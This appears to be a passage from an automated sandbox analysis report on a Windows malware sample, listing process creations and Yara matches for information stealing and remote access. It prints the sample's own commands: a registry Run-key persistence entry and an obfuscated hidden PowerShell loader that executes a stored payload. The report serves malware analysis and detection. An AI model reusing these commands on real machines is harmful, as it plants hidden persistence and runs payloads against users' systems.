Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)"
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe Process created: C:\Windows\SysWOW64\Magnify.exe "C:\Windows\SysWOW64\Magnify.exe"
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe Process created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$lommeregnerens178=get-content 'c:\users\user\appdata\roaming\fertiliseringer\forbrug\venstrehaandsarbejdet.uns';$industrivirksomhederne=$lommeregnerens178.substring(7349,3);.$industrivirksomhederne($lommeregnerens178)"
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%jordbesiddere% -windowstyle minimized $udslettelser=(get-itemproperty -path 'hkcu:\oplukkelig\').bractlets52;%jordbesiddere% ($udslettelser)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403248

Stealing of Sensitive Information

Source: Yara match File source: 00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY